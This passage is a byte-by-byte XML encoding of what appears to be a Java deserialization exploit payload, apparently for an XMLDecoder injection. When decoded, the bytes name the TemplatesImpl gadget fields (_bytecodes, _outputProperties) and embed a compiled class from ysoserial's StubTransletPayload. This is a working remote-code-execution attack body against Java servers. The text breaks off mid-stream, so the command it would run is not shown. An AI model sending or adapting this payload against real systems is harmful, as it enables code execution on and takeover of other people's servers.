index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void index=\"593\"><byte>84</byte></void><void index=\"594\"><byte>114</byte></void><void index=\"595\"><byte>97</byte></void><void index=\"596\"><byte>110</byte></void><void index=\"597\"><byte>115</byte></void><void index=\"598\"><byte>108</byte></void><void index=\"599\"><byte>101</byte></void><void index=\"600\"><byte>116</byte></void><void index=\"601\"><byte>80</byte></void><void index=\"602\"><byte>97</byte></void><void index=\"603\"><byte>121</byte></void><void index=\"604\"><byte>108</byte></void><void index=\"605\"><byte>111</byte></void><void index=\"606\"><byte>97</byte></void><void index=\"607\"><byte>100</byte></void><void index=\"608\"><byte>59</byte></void><void index=\"609\"><byte>1</byte></void><void index=\"610\"><byte>0</byte></void><void index=\"611\"><byte>9</byte></void><void index=\"612\"><byte>116</byte></void><void index=\"613\"><byte>114</byte></void><void index=\"614\"><byte>97</byte></void><void index=\"615\"><byte>110</byte></void><void index=\"616\"><byte>115</byte></void><void index=\"617\"><byte>102</byte></void><void index=\"618\"><byte>111</byte></void><void index=\"619\"><byte>114</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>1</byte></void><void index=\"622\"><byte>0</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>40</byte></void><void index=\"625\"><byte>76</byte></void><void index=\"626\"><byte>99</byte></void><void index=\"627\"><byte>111</byte></void><void index=\"628\"><byte>109</byte></void><void index=\"629\"><byte>47</byte></void><void index=\"630\"><byte>115</byte></void><void index=\"631\"><byte>117</byte></void><void index=\"632\"><byte>110</byte></void><void index=\"633\"><byte>47</byte></void><void index=\"634\"><byte>111</byte></void><void index=\"635\"><byte>114</byte></void><void index=\"636\"><byte>103</byte></void><void index=\"637\"><byte>47</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>112</byte></void><void index=\"640\"><byte>97</byte></void><void index=\"641\"><byte>99</byte></void><void index=\"642\"><byte>104</byte></void><void index=\"643\"><byte>101</byte></void><void index=\"644\"><byte>47</byte></void><void index=\"645\"><byte>120</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>108</byte></void><void index=\"648\"><byte>97</byte></void><void index=\"649\"><byte>110</byte></void><void index=\"650\"><byte>47</byte></void><void index=\"651\"><byte>105</byte></void><void index=\"652\"><byte>110</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>101</byte></void><void index=\"655\"><byte>114</byte></void><void index=\"656\"><byte>110</byte></void><void index=\"657\"><byte>97</byte></void><void index=\"658\"><byte>108</byte></void><void index=\"659\"><byte>47</byte></void><void index=\"660\"><byte>120</byte></void><void index=\"661\"><byte>115</byte></void><void index=\"662\"><byte>108</byte></void><void index=\"663\"><byte>116</byte></void><void index=\"664\"><byte>99</byte></void><void index=\"665\"><byte>47</byte></void><void index=\"666\"><byte>68</byte></void><void index=\"667\"><byte>79</byte></void><void index=\"668\"><byte>77</byte></void><void index=\"669\"><byte>59</byte></void><void index=\"670\"><byte>91</byte></void><void index=\"671\"><byte>76</byte></void><void index=\"672\"><byte>99</byte></void><void index=\"673\"><byte>111</byte></void><void index=\"674\"><byte>109</byte></void><void index=\"675\"><byte>47</byte></void><void index=\"676\"><byte>115</byte></void><void index=\"677\"><byte>117</byte></void><void index=\"678\"><byte>110</byte></void><void index=\"679\"><byte>47</byte></void><void index=\"680\"><byte>111</byte></void><void index=\"681\"><byte>114</byte></void><void index=\"682\"><byte>103</byte></void><void index=\"683\"><byte>47</byte></void><void index=\"684\"><byte>97</byte></void><void index=\"685\"><byte>112</byte></void><void index=\"686\"><byte>97</byte></void><void index=\"687\"><byte>99</byte></void><void index=\"688\"><byte>104</byte></void><void index=\"689\"><byte>101</byte></void><void index=\"690\"><byte>47</byte></void><void index=\"691\"><byte>120</byte></void><void index=\"692\"><byte>109</byte></void><void index=\"693\"><byte>108</byte></void><void index=\"694\"><byte>47</byte></void><void index=\"695\"><byte>105</byte></void><void index=\"696\"><byte>110</byte></void><void index=\"697\"><byte>116</byte></void><void index=\"698\"><byte>101</byte></void><void index=\"699\"><byte>114</byte></void><void index=\"700\"><byte>110</byte></void><void index=\"701\"><byte>97</byte></void><void index=\"702\"><byte>108</byte></void><void index=\"703\"><byte>47</byte></void><void index=\"704\"><byte>115</byte></void><void index=\"705\"><byte>101</byte></void><void index=\"706\"><byte>114</byte></void><void index=\"707\"><byte>105</byte></void><void index=\"708\"><byte>97</byte></void><void index=\"709\"><byte>108</byte></void><void index=\"710\"><byte>105</byte></void><void index=\"711\"><byte>122</byte></void><void index=\"712\"><byte>101</byte></void><void index=\"713\"><byte>114</byte></void><void index=\"714\"><byte>47</byte></void><void index=\"715\"><byte>83</byte></void><void index=\"716\"><byte>101</byte></void><void index=\"717\"><byte>114</byte></void><void index=\"718\"><byte>105</byte></void><void index=\"719\"><byte>97</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>105</byte></void><void index=\"722\"><byte>122</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>116</byte></void><void index=\"725\"><byte>105</byte></void><void index=\"726\"><byte>111</byte></void><void index=\"727\"><byte>110</byte></void><void index=\"728\"><byte>72</byte></void><void index=\"729\"><byte>97</byte></void><void index=\"730\"><byte>110</byte></void><void index=\"731\"><byte>100</byte></void><void index=\"732\"><byte>108</byte></void><void index=\"733\"><byte>101</byte></void><void index=\"734\"><byte>114</byte></void><void index=\"735\"><byte>59</byte></void><void index=\"736\"><byte>41</byte></void><void index=\"737\"><byte>86</byte></void><void index=\"738\"><byte>1</byte></void><void index=\"739\"><byte>0</byte></void><void index=\"740\"><byte>8</byte></void><void index=\"741\"><byte>100</byte></void><void index=\"742\"><byte>111</byte></void><void index=\"743\"><byte>99</byte></void><void index=\"744\"><byte>117</byte></void><void index=\"745\"><byte>109</byte></void><void index=\"746\"><byte>101</byte></void><void index=\"747\"><byte>110</byte></void><void index=\"748\"><byte>116</byte></void><void index=\"749\"><byte>1</byte></void><void index=\"750\"><byte>0</byte></void><void index=\"751\"><byte>45</byte></void><void index=\"752\"><byte>76</byte></void><void index=\"753\"><byte>99</byte></void><void index=\"754\"><byte>111</byte></void><void index=\"755\"><byte>109</byte></void><void index=\"756\"><byte>47</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>117</byte></void><void index=\"759\"><byte>110</byte></void><void index=\"760\"><byte>47</byte></void><void index=\"761\"><byte>111</byte></void><void index=\"762\"><byte>114</byte></void><void index=\"763\"><byte>103</byte></void><void index=\"764\"><byte>47</byte></void><void index=\"765\"><byte>97</byte></void><void index=\"766\"><byte>112</byte></void><void index=\"767\"><byte>97</byte></void><void index=\"768\"><byte>99</byte></void><void index=\"769\"><byte>104</byte></void><void index=\"770\"><byte>101</byte></void><void index=\"771\"><byte>47</byte></void><void index=\"772\"><byte>120</byte></void><void index=\"773\"><byte>97</byte></void><void index=\"774\"><byte>108</byte></void><void index=\"775\"><byte>97</byte></void><void index=\"776\"><byte>110</byte></void><void index=\"777\"><byte>47</byte></void><void index=\"778\"><byte>105</byte></void><void index=\"779\"><byte>110</byte></void><void index=\"780\"><byte>116</byte></void><void index=\"781\"><byte>101</byte></void><void index=\"782\"><byte>114</byte></void><void index=\"783\"><byte>110</byte></void><void index=\"784\"><byte>97</byte></void><void index=\"785\"><byte>108</byte></void><void index=\"786\"><byte>47</byte></void><void index=\"787\"><byte>120</byte></void><void index=\"788\"><byte>115</byte></void><void index=\"789\"><byte>108</byte></void><void index=\"790\"><byte>116</byte></void><void index=\"791\"><byte>99</byte></void><void index=\"792\"><byte>47</byte></void><void index=\"793\"><byte>68</byte></void><void index=\"794\"><byte>79</byte></void><void index=\"795\"><byte>77</byte></void><void index=\"796\"><byte>59</byte></void><void index=\"797\"><byte>1</byte></void><void index=\"798\"><byte>0</byte></void><void index=\"799\"><byte>8</byte></void><void index=\"800\"><byte>104</byte></void><void index=\"801\"><byte>97</byte></void><void index=\"802\"><byte>110</byte></void><void index=\"803\"><byte>100</byte></void><void index=\"804\"><byte>108</byte></void><void index=\"805\"><byte>101</byte></void><void index=\"806\"><byte>114</byte></void><void index=\"807\"><byte>115</byte></void><void index=\"808\"><byte>1</byte></void><void index=\"809\"><byte>0</byte></void><void index=\"810\"><byte>66</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void index=\"860\"><byte>97</byte></void><void index=\"861\"><byte>108</byte></void><void index=\"862\"><byte>105</byte></void><void index=\"863\"><byte>122</byte></void><void index=\"864\"><byte>97</byte></void><void index=\"865\"><byte>116</byte></void><void index=\"866\"><byte>105</byte></void><void index=\"867\"><byte>111</byte></void><void index=\"868\"><byte>110</byte></void><void index=\"869\"><byte>72</byte></void><void index=\"870\"><byte>97</byte></void><void index=\"871\"><byte>110</byte></void><void index=\"872\"><byte>100</byte></void><void index=\"873\"><byte>108</byte></void><void index=\"874\"><byte>101</byte></void><void index=\"875\"><byte>114</byte></void><void index=\"876\"><byte>59</byte></void><void index=\"877\"><byte>1</byte></void><void index=\"878\"><byte>0</byte></void><void index=\"879\"><byte>10</byte></void><void index=\"880\"><byte>69</byte></void><void index=\"881\"><byte>120</byte></void><void index=\"882\"><byte>99</byte></void><void index=\"883\"><byte>101</byte></void><void index=\"884\"><byte>112</byte></void><void index=\"885\"><byte>116</byte></void><void index=\"886\"><byte>105</byte></void><void index=\"887\"><byte>111</byte></void><void index=\"888\"><byte>110</byte></void><void index=\"889\"><byte>115</byte></void><void index=\"890\"><byte>7</byte></void><void index=\"891\"><byte>0</byte></void><void index=\"892\"><byte>39</byte></void><void index=\"893\"><byte>1</byte></void><void index=\"894\"><byte>0</byte></void><void index=\"895\"><byte>-90</byte></void><void index=\"896\"><byte>40</byte></void><void index=\"897\"><byte>76</byte></void><void index=\"898\"><byte>99</byte></void><void index=\"899\"><byte>111</byte></void><void index=\"900\"><byte>109</byte></void><void index=\"901\"><byte>47</byte></void><void index=\"902\"><byte>115</byte></void><void index=\"903\"><byte>117</byte></void><void index=\"904\"><byte>110</byte></void><void index=\"905\"><byte>47</byte></void><void 